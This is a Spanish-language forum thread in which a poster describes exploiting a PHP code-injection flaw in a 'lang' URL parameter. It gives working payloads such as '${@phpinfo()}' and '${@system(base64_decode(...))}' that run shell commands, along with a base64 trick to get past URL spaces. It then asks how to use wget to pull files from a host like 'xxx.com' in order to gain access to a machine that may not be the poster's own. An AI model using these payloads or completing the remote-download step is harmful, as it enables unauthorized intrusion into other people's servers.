Buenas.
Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:
1.-http://localhost/?lang=${@phpinfo()} FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).
2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.
3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA
Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.
Thanks. ;D
Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686
Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc).
¿Qué comandos, y de qué manera debería ponerlos en la url para acceder?
Gracias.
Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64.
Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64))
XXXCODEENBASE64=wget xxx.com/phpinfo.txt
Pero no funciona, se tira todo el rato cargando y no hace nada...
Pues no se que quieres hacer, pero... el wget lo puedes hacer desde la misma consola de tu PC
Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga...
¿Qué otra cosa puedo hacer?